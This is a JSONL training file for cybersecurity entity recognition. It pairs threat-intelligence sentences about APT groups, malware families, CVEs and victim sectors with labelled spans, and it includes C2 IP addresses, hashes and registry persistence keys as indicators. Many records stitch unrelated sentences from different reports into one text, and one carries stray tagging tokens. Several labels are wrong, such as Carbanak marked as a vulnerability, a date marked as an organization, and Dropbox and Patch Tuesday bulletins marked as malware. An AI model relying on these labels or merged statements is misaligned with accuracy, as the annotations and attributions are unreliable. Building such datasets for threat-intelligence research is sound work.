{"text": "These techniques permit the CIA to bypass the encryption of WhatsApp , Signal , Telegram , Wiebo , Confide and Cloackman by hacking the smart phones that they run on and collecting audio and message traffic before encryption is applied . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": {"THREAT_ACTOR: CIA": [[28, 31]], "FILEPATH: document malware": [[264, 280]], "ORGANIZATION: Tibetan non-governmental organizations": [[300, 338]], "ORGANIZATION: NGOs": [[341, 345]], "ORGANIZATION: Falun Gong": [[367, 377]], "ORGANIZATION: Uyghur groups": [[382, 395]]}, "info": {"id": "cyberner_stix_train_005741", "source": "cyberner_stix_train"}}
{"text": "The dropper installs 2 files :", "spans": {}, "info": {"id": "cyberner_stix_train_005742", "source": "cyberner_stix_train"}}
{"text": "This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies . Considering the language being used in the malicious code is Arabic , it seems that the attacker is familiar with Arabic language as well .", "spans": {"VULNERABILITY: Carbanak": [[72, 80]], "ORGANIZATION: financial industry": [[97, 115]], "ORGANIZATION: payment providers": [[126, 143]], "ORGANIZATION: retail industry": [[146, 161]], "ORGANIZATION: PR companies": [[166, 178]]}, "info": {"id": "cyberner_stix_train_005743", "source": "cyberner_stix_train"}}
{"text": "However , it was detected dynamically by the host intrusion prevention subsystem when it appeared in the system and was executed .", "spans": {}, "info": {"id": "cyberner_stix_train_005744", "source": "cyberner_stix_train"}}
{"text": "This variable is decoded with the base64 algorithm in order to get a Windows library ( PE file ) which is written to disk .", "spans": {"SYSTEM: Windows": [[69, 76]], "TOOL: PE": [[87, 89]]}, "info": {"id": "cyberner_stix_train_005745", "source": "cyberner_stix_train"}}
{"text": "MESSAGE – send SMS containing specified text to a specified number . During this testing , we saw document filenames that contain the C2 we witnessed in the targeted attack above , specifically the filenames XLS-withyourface.xls and XLS-withyourface – test.xls . CTU researchers also identified components in the custom C2 protocol being used ( the ACT in which the malware talks to the Command and Control Servers ) which they have seen utilized by Nickel Academy ( Lazarus ) previously .", "spans": {"MALWARE: XLS-withyourface.xls": [[208, 228]], "MALWARE: XLS-withyourface – test.xls": [[233, 260]], "ORGANIZATION: CTU": [[263, 266]], "MALWARE: custom C2 protocol": [[313, 331]], "THREAT_ACTOR: Nickel Academy": [[450, 464]], "THREAT_ACTOR: Lazarus": [[467, 474]]}, "info": {"id": "cyberner_stix_train_005746", "source": "cyberner_stix_train"}}
{"text": "This was more complex .", "spans": {}, "info": {"id": "cyberner_stix_train_005747", "source": "cyberner_stix_train"}}
{"text": "Apps with a custom-made advertisement SDK The simplest PHA from the author 's portfolio used a specially crafted advertisement SDK to create a proxy for all ads-related network traffic . Unit 42 's analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . The first spear phishing message was sent to a Taiwanese governmental employee on Dec. 1 . FireEye detects this activity across our platforms .", "spans": {"ORGANIZATION: Unit 42": [[187, 194]], "TOOL: NetTraveler": [[218, 229]], "VULNERABILITY: CVE-2012-0158": [[251, 264]], "TOOL: NetTraveler Trojan": [[276, 294]], "ORGANIZATION: FireEye": [[388, 395]]}, "info": {"id": "cyberner_stix_train_005748", "source": "cyberner_stix_train"}}
{"text": "When DualToy began to spread in January 2015 , it was only capable of infecting Android devices . In 2018 , we discovered a new version of the Ketrican backdoor that featured some code improvements . Malware used by Lazarus Group correlates to other reported campaigns , including Operation Flame , Operation 1Mission , Operation Troy , DarkSeoul , and Ten Days of Rain .", "spans": {"MALWARE: DualToy": [[5, 12]], "SYSTEM: Android": [[80, 87]], "ORGANIZATION: we": [[108, 110]], "THREAT_ACTOR: Lazarus Group": [[216, 229]], "MALWARE: Operation Flame": [[281, 296]], "MALWARE: Operation 1Mission": [[299, 317]], "MALWARE: Operation Troy": [[320, 334]], "MALWARE: DarkSeoul": [[337, 346]], "MALWARE: Ten Days of Rain": [[353, 369]]}, "info": {"id": "cyberner_stix_train_005749", "source": "cyberner_stix_train"}}
{"text": "Key : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\AudioMgr Key : HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleIndexer .", "spans": {}, "info": {"id": "cyberner_stix_train_005750", "source": "cyberner_stix_train"}}
{"text": "Command Description push Shows a push notification . The SectorJ04 group’s preexisting targets were financial institutions located in countries such as North America and Europe , or general companies such as retail and manufacturing , but they recently expanded their areas of activity to include the medical , pharmaceutical , media , energy and manufacturing industries . Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": {"THREAT_ACTOR: SectorJ04": [[57, 66]], "ORGANIZATION: financial institutions": [[100, 122]], "ORGANIZATION: medical": [[301, 308]], "ORGANIZATION: pharmaceutical": [[311, 325]], "ORGANIZATION: media": [[328, 333]], "ORGANIZATION: energy": [[336, 342]], "ORGANIZATION: manufacturing": [[347, 360]], "ORGANIZATION: Kaspersky": [[374, 383]], "TOOL: Adobe Flash Player": [[417, 435]], "VULNERABILITY: zero-day": [[436, 444]], "VULNERABILITY: CVE-2016-4117": [[461, 474]], "MALWARE: FinSpy": [[521, 527]]}, "info": {"id": "cyberner_stix_train_005751", "source": "cyberner_stix_train"}}
{"text": "We believe that , unusually , the purpose of the OnionDuke variant spread via the Tor node was not to pursue targeted attacks but instead to form a small botnet for later use .", "spans": {"MALWARE: OnionDuke": [[49, 58]], "TOOL: Tor": [[82, 85]]}, "info": {"id": "cyberner_stix_train_005752", "source": "cyberner_stix_train"}}
{"text": "Privilege escalation requests The screens asking for the user 's approval wo n't close unless the user approves the privilege escalation . Attackers use it to create , expand and cement their foothold in compromised environments . Prior to the discovery of Operation Daybreak , we observed the ScarCruft APT launching a series of attacks in Operation Erebus .", "spans": {"THREAT_ACTOR: Attackers": [[139, 148]], "THREAT_ACTOR: ScarCruft APT": [[294, 307]]}, "info": {"id": "cyberner_stix_train_005753", "source": "cyberner_stix_train"}}
{"text": "SHA256 : 4393ff391396cdfd229517dd98aa7faecad04da479fe8ca322f035ceee363273 .", "spans": {"FILEPATH: 4393ff391396cdfd229517dd98aa7faecad04da479fe8ca322f035ceee363273": [[9, 73]]}, "info": {"id": "cyberner_stix_train_005754", "source": "cyberner_stix_train"}}
{"text": "Virulent Android malware returns , gets > 2 million downloads on Google Play HummingWhale is back with new tricks , including a way to gin user ratings . We believe they started this watering hole campaign at the end of 2016 after their other operation was interrupted in South East Asia . Two users in the targeted organization received a file called \" JobDetails.rar \" , which attempted to exploit the WinRAR vulnerability . UNC4899 targeting overlaps with a separate RGB - aligned group , APT43 , who in July , 2023 displayed interest in the cryptocurrency vertical , specifically targeting a variety of C - Suite executives from multiple fintech and cryptocurrency companies in the United States , South Korea , Hong Kong , and Singapore .", "spans": {"MALWARE: Virulent": [[0, 8]], "SYSTEM: Android": [[9, 16]], "SYSTEM: Google Play": [[65, 76]], "MALWARE: HummingWhale": [[77, 89]], "FILEPATH: JobDetails.rar": [[354, 368]], "TOOL: WinRAR": [[404, 410]], "THREAT_ACTOR: UNC4899": [[427, 434]], "THREAT_ACTOR: APT43": [[492, 497]], "ORGANIZATION: C - Suite executives from multiple fintech and cryptocurrency companies": [[607, 678]]}, "info": {"id": "cyberner_stix_train_005755", "source": "cyberner_stix_train"}}
{"text": "It controls each and every functionality based on the commands sent by the command and control ( C & C ) server . However , Buckeye had already been using some of these leaked tools at least a year beforehand . Gorgon Group is a threat group consisting of members who are suspected to be Pakistan based or have other connections to Pakistan .", "spans": {"THREAT_ACTOR: Buckeye": [[124, 131]], "TOOL: leaked tools": [[169, 181]], "THREAT_ACTOR: Gorgon Group": [[211, 223]]}, "info": {"id": "cyberner_stix_train_005756", "source": "cyberner_stix_train"}}
{"text": "In that report , we documented our observation that the Sofacy group appeared to use conventional obfuscation techniques to mask their infrastructure attribution by using random registrant and service provider information for each of their attacks .", "spans": {"THREAT_ACTOR: Sofacy": [[56, 62]]}, "info": {"id": "cyberner_stix_train_005757", "source": "cyberner_stix_train"}}
{"text": "We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded . Threat actors have targeted the government of Thailand and delivered the newly discovered Bookworm Trojan since July 2015 .", "spans": {"TOOL: Powermud backdoor": [[29, 46]], "MALWARE: Backdoor.Powemuddy": [[66, 84]], "TOOL: custom tools": [[93, 105]], "MALWARE: makecab.exe": [[238, 249]], "ORGANIZATION: government": [[338, 348]], "MALWARE: Bookworm Trojan": [[396, 411]]}, "info": {"id": "cyberner_stix_train_005758", "source": "cyberner_stix_train"}}
{"text": "This suggests that the operators of the Command & Control are not enforcing a validation of the targets . HELIX KITTEN is likely an Iranian-based adversary group , active since at least late 2015 , targeting organizations in the aerospace , energy , financial , government , hospitality and telecommunications business verticals . Additionally , the generated code by uncompyle6 varies depending on the version and the impact is important . Cisco Secure Malware Analytics ( formerly Threat Grid ) identifies malicious binaries and builds protection into all Cisco Secure products .", "spans": {"THREAT_ACTOR: HELIX KITTEN": [[106, 118]], "THREAT_ACTOR: group": [[156, 161]], "ORGANIZATION: aerospace": [[229, 238]], "ORGANIZATION: energy": [[241, 247]], "ORGANIZATION: financial": [[250, 259]], "ORGANIZATION: government": [[262, 272]], "ORGANIZATION: hospitality": [[275, 286]], "ORGANIZATION: telecommunications business": [[291, 318]], "TOOL: uncompyle6": [[368, 378]], "TOOL: Cisco Secure Malware Analytics": [[441, 471]], "TOOL: Threat Grid": [[483, 494]]}, "info": {"id": "cyberner_stix_train_005759", "source": "cyberner_stix_train"}}
{"text": "HammerDuke ’s use of Twitter and crafted image files is reminiscent of other Duke toolsets .", "spans": {"MALWARE: HammerDuke": [[0, 10]], "TOOL: Twitter": [[21, 28]], "THREAT_ACTOR: Duke": [[77, 81]]}, "info": {"id": "cyberner_stix_train_005760", "source": "cyberner_stix_train"}}
{"text": "TG-3390 SWCs may be largely geographically independent , but the group's most frequently used C2 registrars and IP net blocks are located in the U.S. Using a U.S. based C2 infrastructure to compromise targets in the U.S. helps TG-3390 actors avoid geo-blocking and geo-flagging measures used in network defense .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7], [227, 234]], "SYSTEM: SWCs": [[8, 12]], "TOOL: C2": [[94, 96], [169, 171]]}, "info": {"id": "cyberner_stix_train_005761", "source": "cyberner_stix_train"}}
{"text": "Since late 2018 , based upon the most-recent posting , FireEye appears to have “ walked back ” the previously-used terminology of TEMP.Veles and instead refers rather cryptically to the “ TRITON actor ” , while Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME .", "spans": {"ORGANIZATION: FireEye": [[55, 62]], "THREAT_ACTOR: TEMP.Veles": [[130, 140]], "MALWARE: TRITON": [[188, 194]], "ORGANIZATION: Dragos": [[211, 217]], "THREAT_ACTOR: XENOTIME": [[294, 302]]}, "info": {"id": "cyberner_stix_train_005762", "source": "cyberner_stix_train"}}
{"text": "February saw three particularly interesting publications on the topic of macOS malware: a Trojan Cocoa application that sends system information including keychain data back to the attacker , a macOS version of APT28’s Xagent malware , and a new Trojan ransomware . In this latest incident , the group registered a fake news domain , timesofindiaa.in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day .", "spans": {"THREAT_ACTOR: attacker": [[181, 189]], "THREAT_ACTOR: APT28’s": [[211, 218]], "MALWARE: Trojan ransomware": [[246, 263]], "TOOL: emails": [[412, 418]], "ORGANIZATION: government officials": [[429, 449]]}, "info": {"id": "cyberner_stix_train_005763", "source": "cyberner_stix_train"}}
{"text": "A closer examination of the tool revealed the second user agent string was from a secondary payload that was retrieved by the cba5ab65a24be52214736bc1a5bc984953a9c15d0a3826d5b15e94036e5497df sample .", "spans": {"FILEPATH: cba5ab65a24be52214736bc1a5bc984953a9c15d0a3826d5b15e94036e5497df": [[126, 190]]}, "info": {"id": "cyberner_stix_train_005764", "source": "cyberner_stix_train"}}
{"text": "Chinese APK names : Some of FakeSpy ’ s APK package names contain anglicized Chinese ( Mandarin ) words that might be related to Chinese songs and lyrics , food , provinces , etc . Instead , the campaign used compromised legitimate accounts to trick victims into installing malware . Other names for the group are Vixen Panda , Ke3chang , Royal APT , and Playful Dragon .", "spans": {"MALWARE: FakeSpy": [[28, 35]], "TOOL: compromised legitimate accounts": [[209, 240]], "THREAT_ACTOR: Vixen Panda": [[314, 325]], "THREAT_ACTOR: Ke3chang": [[328, 336]], "THREAT_ACTOR: Royal APT": [[339, 348]], "THREAT_ACTOR: Playful Dragon": [[355, 369]]}, "info": {"id": "cyberner_stix_train_005765", "source": "cyberner_stix_train"}}
{"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . The group is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that .", "spans": {"MALWARE: st07383.en17.docx": [[12, 29]], "VULNERABILITY: CVE-2017-0001": [[80, 93]], "MALWARE: SHIRIME": [[199, 206]], "ORGANIZATION: WikiLeaks'": [[249, 259]], "ORGANIZATION: Twitter": [[311, 318], [375, 382]], "ORGANIZATION: Mark Zuckerberg": [[356, 371]], "ORGANIZATION: Pinterest": [[387, 396]], "ORGANIZATION: BuzzFeed": [[426, 434]], "ORGANIZATION: TechCrunch": [[439, 449]]}, "info": {"id": "cyberner_stix_train_005766", "source": "cyberner_stix_train"}}
{"text": "While Sofacy is also known to use of custom exploit frameworks and spear-phishing attacks , it is possible in this case that they managed to obtain privileged credentials of network administrators within the Bundestag through the use of a phishing attack , which then allowed them to navigate through the network and gain access to more data .", "spans": {"THREAT_ACTOR: Sofacy": [[6, 12]], "ORGANIZATION: Bundestag": [[208, 217]]}, "info": {"id": "cyberner_stix_train_005767", "source": "cyberner_stix_train"}}
{"text": "The second stage The second stage apps contain the surveillanceware capabilities . What actually happens is that the malware is able to decode data from the PDF documents and interpret it as commands for the backdoor . The installed service registry key is opened and the 2 values under its Parameter subkey are created . A great example is that of the notorious bank robber slick Willy Sutton .", "spans": {"TOOL: PDF documents": [[157, 170]], "THREAT_ACTOR: the notorious bank robber": [[349, 374]], "THREAT_ACTOR: Willy Sutton": [[381, 393]]}, "info": {"id": "cyberner_stix_train_005768", "source": "cyberner_stix_train"}}
{"text": "In the case of this malware , the activity groups strongly associated with Winnti are BARIUM and LEAD .", "spans": {"MALWARE: Winnti": [[75, 81]], "THREAT_ACTOR: BARIUM": [[86, 92]], "THREAT_ACTOR: LEAD": [[97, 101]]}, "info": {"id": "cyberner_stix_train_005769", "source": "cyberner_stix_train"}}
{"text": "IOCs C & C IP addresses : 155.133.82.181 155.133.82.240 155.133.82.244 185.234.218.59 195.22.126.160 195.22.126.163 195.22.126.80 195.22.126.81 5.45.73.24 5.45.74.130 IP addresses from which the Trojan was downloaded : 185.174.173.31 185.234.218.59 188.166.156.110 195.22.126.160 195.22.126.80 195.22.126.81 In 2016 , the threat actors conducted a strategic web compromise ( SWC ) on the website of an international industry organization that affected aerospace , academic , media , technology , government , and utilities organizations around the world . With technologies that employ web/URL filtering , behavioral analysis , and custom sandboxing , XGen security offers protection against ever-changing threats that bypass traditional controls and exploit known and unknown vulnerabilities . Talos discovered multiple vulnerabilities in Foxit PDF Reader that could allow an adversary to execute , arbitrary code on the targeted machine .", "spans": {"TOOL: SWC": [[375, 378]], "ORGANIZATION: international industry organization": [[402, 437]], "ORGANIZATION: aerospace": [[452, 461]], "ORGANIZATION: academic": [[464, 472]], "ORGANIZATION: media": [[475, 480]], "ORGANIZATION: technology": [[483, 493]], "ORGANIZATION: government": [[496, 506]], "ORGANIZATION: utilities organizations": [[513, 536]], "TOOL: XGen": [[652, 656]], "ORGANIZATION: Talos": [[795, 800]], "TOOL: Foxit PDF Reader": [[840, 856]]}, "info": {"id": "cyberner_stix_train_005771", "source": "cyberner_stix_train"}}
{"text": "As such , these findings represent a collection of compromised websites , compromised registrar accounts used to spin up subdomains , domains used by malware DGA ’s , phishing kits , carding forums , malware C2 sites , and a slew of other domains that revolve around criminal activity .", "spans": {"MALWARE: DGA": [[158, 161]], "TOOL: C2": [[208, 210]]}, "info": {"id": "cyberner_stix_train_005772", "source": "cyberner_stix_train"}}
{"text": "Otherwise , it will return a JSON encoded \" OK , '' and if that is the case , the command to be executed . The United States and countries in Europe are targeted as well . The DUDELL sample is a weaponized Microsoft Excel B-IDTY I-TOOL document that contains a malicious macro E-TOOL that runs on the victim ’s machine . Subscribing to the Talos weekly newsletter provides information about the most prevalent malware .", "spans": {"MALWARE: DUDELL": [[176, 182]], "TOOL: Microsoft": [[206, 215]], "TOOL: malicious": [[261, 270]], "TOOL: macro E-TOOL": [[271, 283]], "ORGANIZATION: Talos": [[340, 345]]}, "info": {"id": "cyberner_stix_train_005773", "source": "cyberner_stix_train"}}
{"text": "Following are some examples of the decoys used by these droppers : The purpose of Exodus One seems to be to collect some basic identifying information about the device ( namely the IMEI code and the phone number ) and send it to the Command & Control server . The tester created the final test file less than 8 hours before the creation time of a delivery document , which was then delivered via a spear-phishing email 20 minutes later . The attacker used a second trick to avoid analysis of the python code . There was a massive decrease in the activity from Royal , for example , which normally dominates the monthly rankings — often cracking into the top five — with an average of roughly 30 attacks a month in that period .", "spans": {"MALWARE: Exodus One": [[82, 92]], "TOOL: python": [[496, 502]], "THREAT_ACTOR: Royal": [[560, 565]]}, "info": {"id": "cyberner_stix_train_005774", "source": "cyberner_stix_train"}}
{"text": "Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech , government services , media and financial services industries . When the New York Times and Mandiant last year unmasked a large scale Chinese hacking operation , pinpointing its location down to the building , the report drew mainstream attention to what security professionals already well knew : sophisticated threat actors carry out persistent cyber operations over months and years .", "spans": {"THREAT_ACTOR: APT groups": [[85, 95]], "ORGANIZATION: high-tech": [[190, 199]], "ORGANIZATION: government services": [[202, 221]], "ORGANIZATION: media": [[224, 229]], "ORGANIZATION: financial services industries": [[234, 263]], "ORGANIZATION: New York Times": [[275, 289]], "ORGANIZATION: Mandiant": [[294, 302]]}, "info": {"id": "cyberner_stix_train_005775", "source": "cyberner_stix_train"}}
{"text": "The Shadow Brokers , the group that publicly dumped a cache of NSA hacking tools , appears to be back and ready to sell stolen material on an individual basis . According to the Fxmsp , they worked tirelessly for the first quarter of 2019 to breach these companies and finally succeeded and obtained access to the companies' internal networks .", "spans": {"THREAT_ACTOR: Shadow Brokers": [[4, 18]], "TOOL: NSA hacking tools": [[63, 80]]}, "info": {"id": "cyberner_stix_train_005776", "source": "cyberner_stix_train"}}
{"text": "Proofpoint is tracking this attacker , believed to operate out of China , as TA459 .", "spans": {"THREAT_ACTOR: TA459": [[77, 82]]}, "info": {"id": "cyberner_stix_train_005777", "source": "cyberner_stix_train"}}
{"text": "First Signs in September 2019 In September 2019 , a tweet by CERT-Bund caught the attention of the IBM Trusteer Mobile Security Research team . specifically CVE-2018-0798 , before downloading subsequent payloads . The OilRig group continues to be a persistent adversary group in the Middle East region .", "spans": {"ORGANIZATION: CERT-Bund": [[61, 70]], "ORGANIZATION: IBM Trusteer Mobile Security Research": [[99, 136]], "VULNERABILITY: CVE-2018-0798": [[157, 170]], "THREAT_ACTOR: OilRig group": [[218, 230]]}, "info": {"id": "cyberner_stix_train_005778", "source": "cyberner_stix_train"}}
{"text": "In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . Initial attack targets are commonly software and gaming organizations in United States , Japan , South Korea , and China .", "spans": {"VULNERABILITY: CVE-2011-3544": [[49, 62]], "TOOL: HTTPBrowser backdoor": [[130, 150]], "VULNERABILITY: CVE-2010-0738": [[157, 170]], "TOOL: JBoss": [[192, 197]], "ORGANIZATION: gaming organizations": [[362, 382]]}, "info": {"id": "cyberner_stix_train_005779", "source": "cyberner_stix_train"}}
{"text": "In particular , these packages have not been observed to contain or to download exploits which would be required to perform certain types of activities on iOS devices . Some of the documents exploited CVE-2017-0199 to deliver the payload . Cisco Talos assesses with moderate confidence that a campaign we recently discovered called \" BlackWater \" is associated with suspected persistent threat actor MuddyWater .", "spans": {"SYSTEM: iOS": [[155, 158]], "MALWARE: documents": [[181, 190]], "VULNERABILITY: CVE-2017-0199": [[201, 214]], "ORGANIZATION: Cisco Talos": [[240, 251]], "THREAT_ACTOR: threat actor MuddyWater": [[387, 410]]}, "info": {"id": "cyberner_stix_train_005780", "source": "cyberner_stix_train"}}
{"text": "We found traces of the Gooligan malware code in dozens of legitimate-looking apps on third-party Android app stores . Although APT38 is distinct from other TEMP.Hermit activity , both groups operate consistently within the interests of the North Korean state . The global variable value dword_745BB58C is either even or odd , The most significant similarities we identified are with INDUSTROYER and INDUSTROYER.V2 , which were both malware variants deployed in the past to impact electricity transmission and distribution .", "spans": {"MALWARE: Gooligan": [[23, 31]], "SYSTEM: Android": [[97, 104]], "THREAT_ACTOR: APT38": [[127, 132]], "THREAT_ACTOR: groups": [[184, 190]], "MALWARE: INDUSTROYER": [[383, 394]], "MALWARE: INDUSTROYER.V2": [[399, 413]], "MALWARE: malware": [[432, 439]]}, "info": {"id": "cyberner_stix_train_005781", "source": "cyberner_stix_train"}}
{"text": "The Android banking Trojan rental business Rental of banking Trojans is not new . Machete was active and constantly working on very effective spearphishing campaigns . This is evidence of shared motivation and intent to target the SWIFT system by the North Korean operators performing the reconnaissance and APT38 which later targeted that organization .", "spans": {"SYSTEM: Android": [[4, 11]], "THREAT_ACTOR: Machete": [[82, 89]], "THREAT_ACTOR: operators": [[264, 273]], "THREAT_ACTOR: APT38": [[308, 313]]}, "info": {"id": "cyberner_stix_train_005782", "source": "cyberner_stix_train"}}
{"text": "'' The report said HummingBad apps are developed by Yingmob , a Chinese mobile ad server company that other researchers claim is behind the Yinspector iOS malware . These and other tools used by the Lazarus group can be mitigated by routinely scanning the network for any malicious activity to help prevent the malware from entering and spreading through an organization . APT33 : 64.251.19.214 mynetwork.ddns.net . To perform analysis of NetScaler memory core dump files , they need to be collected .", "spans": {"MALWARE: HummingBad": [[19, 29]], "ORGANIZATION: Yingmob": [[52, 59]], "MALWARE: Yinspector": [[140, 150]], "SYSTEM: iOS": [[151, 154]], "THREAT_ACTOR: Lazarus group": [[199, 212]], "THREAT_ACTOR: APT33": [[373, 378]], "DOMAIN: 64.251.19.214": [[381, 394]], "DOMAIN: mynetwork.ddns.net": [[395, 413]], "SYSTEM: NetScaler memory core dump files": [[439, 471]]}, "info": {"id": "cyberner_stix_train_005783", "source": "cyberner_stix_train"}}
{"text": "Disable , discontinue , or disallow the use of Internet Control Message Protocol ( ICMP ) and Simple Network Management Protocol ( SNMP ) as much as possible .", "spans": {}, "info": {"id": "cyberner_stix_train_005784", "source": "cyberner_stix_train"}}
{"text": "With Version 0.0.0.1 , there is a dedicated functions class where all main malicious activity happens and can be observed . Rapid7 reviewed malware discovered in the victim’s environment and found implants that used Dropbox as the C2 . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 .", "spans": {"ORGANIZATION: Rapid7": [[124, 130]], "MALWARE: Dropbox": [[216, 223]], "MALWARE: POWRUNER": [[236, 244]], "FILEPATH: RTF file": [[277, 285]], "VULNERABILITY: CVE-2017-0199": [[301, 314]]}, "info": {"id": "cyberner_stix_train_005785", "source": "cyberner_stix_train"}}
{"text": "To bypass Google Play Store security checks , the malware creators used a very interesting method : they uploaded a clean app to the store at the end of March , 2017 , and would then update it with a malicious version for short period of time . COVELLITE operates globally with targets primarily in Europe , East Asia , and North America . The code is specifically looking for data in Portuguese and English , allowing the attackers to steal credit card data from web pages written in these languages . This dangerous malware was developed to exploit weaknesses in those systems and the communication protocols they use – systems developed decades ago with almost no security measures .", "spans": {"SYSTEM: Google Play Store": [[10, 27]]}, "info": {"id": "cyberner_stix_train_005786", "source": "cyberner_stix_train"}}
{"text": "The recent activity in the U.S. is but one of many instances of Russian Government influence operations conducted in support of strategic political objectives , and it will not be the last .", "spans": {}, "info": {"id": "cyberner_stix_train_005787", "source": "cyberner_stix_train"}}
{"text": "EventBot web injects execution method Web injects execution method by a pre-established configuration . Create a link file in the startup folder for AutoHotkeyU32.exe , allowing the attack to persist even after a system restart . Although we have only observed APT33 use DROPSHOT to deliver TURNEDUP , we have identified multiple DROPSHOT samples in the wild that delivered wiper malware we call SHAPESHIFT .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: link file": [[113, 122]], "MALWARE: AutoHotkeyU32.exe": [[149, 166]], "THREAT_ACTOR: APT33": [[261, 266]], "MALWARE: DROPSHOT": [[271, 279]], "MALWARE: DROPSHOT samples": [[330, 346]], "MALWARE: SHAPESHIFT": [[396, 406]]}, "info": {"id": "cyberner_stix_train_005788", "source": "cyberner_stix_train"}}
{"text": "Turla has been operating for a number of years and its activities have been monitored and analyzed by ESET research laboratories . The malware was initially distributed through a compromised software update system and then self-propagated through stolen credentials and SMB exploits , including the EternalBlue exploit used in the WannaCry attack from May 2017 .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]], "ORGANIZATION: ESET": [[102, 106]], "FILEPATH: malware": [[135, 142]], "MALWARE: EternalBlue exploit": [[299, 318]], "THREAT_ACTOR: WannaCry": [[331, 339]]}, "info": {"id": "cyberner_stix_train_005789", "source": "cyberner_stix_train"}}
{"text": "HttpBrowser ( also known as TokenControl ) — A backdoor notable for HTTPS communications with the HttpBrowser User-Agent .", "spans": {"MALWARE: HttpBrowser": [[0, 11], [98, 109]], "MALWARE: TokenControl": [[28, 40]], "TOOL: User-Agent": [[110, 120]]}, "info": {"id": "cyberner_stix_train_005790", "source": "cyberner_stix_train"}}
{"text": "It saves the messages ’ metadata and content , filters the information by fields , and sends them to the C2 server using the URL /servlet/SendMassage2 . We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . The Ke3chang have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , chemicals , manufacturing , mining sectors .", "spans": {"THREAT_ACTOR: actors": [[168, 174]], "VULNERABILITY: CVE-2017-0144": [[262, 275]], "MALWARE: MS17-010": [[315, 323]], "THREAT_ACTOR: Ke3chang": [[330, 338]], "ORGANIZATION: aerospace": [[423, 432]], "ORGANIZATION: energy": [[435, 441]], "ORGANIZATION: government": [[444, 454]], "ORGANIZATION: high-tech": [[457, 466]], "ORGANIZATION: consulting services": [[469, 488]], "ORGANIZATION: chemicals": [[491, 500]], "ORGANIZATION: manufacturing": [[503, 516]], "ORGANIZATION: mining sectors": [[519, 533]]}, "info": {"id": "cyberner_stix_train_005791", "source": "cyberner_stix_train"}}
{"text": "Instead of running its service only at boot time , it registers a receiver that listens to the “ android.intent.action.SCREEN_ON ” and “ android.provider.Telephony.SMS_DELIVER ” broadcast actions . However , Brazilian actors commonly use several methods to do so , such as reselling cards they have created , paying bills with stolen cards in return for a portion of the bill's value and reselling illicitly obtained goods . While investigating recent attacks performed by the threat actor group OilRig using their new Bondupdater version , Unit 42 researchers searched for additional Microsoft Office documents used by OilRig hoping to locate additional malware being used in other attacks during the same time period .", "spans": {"THREAT_ACTOR: actors": [[218, 224]], "THREAT_ACTOR: threat actor group OilRig": [[477, 502]], "MALWARE: Bondupdater": [[519, 530]], "ORGANIZATION: Unit 42": [[541, 548]], "ORGANIZATION: Microsoft": [[585, 594]], "THREAT_ACTOR: OilRig": [[620, 626]]}, "info": {"id": "cyberner_stix_train_005792", "source": "cyberner_stix_train"}}
{"text": "The second timer will run every five seconds and it will try to enable the WiFi if it 's disabled . Gamaredon Group primarily target Ukrainian organizations and resources using spear-phishing attacks , and they use military or similar documents as bait . The compilation times of APT37 malware is consistent with a developer operating in the North Korea time zone ( UTC +8:30 ) and follows what is believed to be a typical North Korean workday .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[100, 115]], "ORGANIZATION: organizations": [[143, 156]], "TOOL: documents": [[235, 244]], "MALWARE: APT37": [[280, 285]], "MALWARE: malware": [[286, 293]]}, "info": {"id": "cyberner_stix_train_005793", "source": "cyberner_stix_train"}}
{"text": "In mid-2016 , malware that FireEye believes to be unique to APT32 was detected on the networks of a global hospitality industry developer with plans to expand operations into Vietnam . The most popular targets of SneakyPastes are embassies , government entities , education , media outlets , journalists , activists , political parties or personnel , healthcare and banking .", "spans": {"ORGANIZATION: mid-2016": [[3, 11]], "ORGANIZATION: FireEye": [[27, 34]], "THREAT_ACTOR: APT32": [[60, 65]], "ORGANIZATION: hospitality": [[107, 118]], "THREAT_ACTOR: SneakyPastes": [[213, 225]], "ORGANIZATION: embassies": [[230, 239]], "ORGANIZATION: government entities": [[242, 261]], "ORGANIZATION: education": [[264, 273]], "ORGANIZATION: media outlets": [[276, 289]], "ORGANIZATION: activists": [[306, 315]], "ORGANIZATION: personnel": [[339, 348]], "ORGANIZATION: healthcare": [[351, 361]], "ORGANIZATION: banking": [[366, 373]]}, "info": {"id": "cyberner_stix_train_005794", "source": "cyberner_stix_train"}}
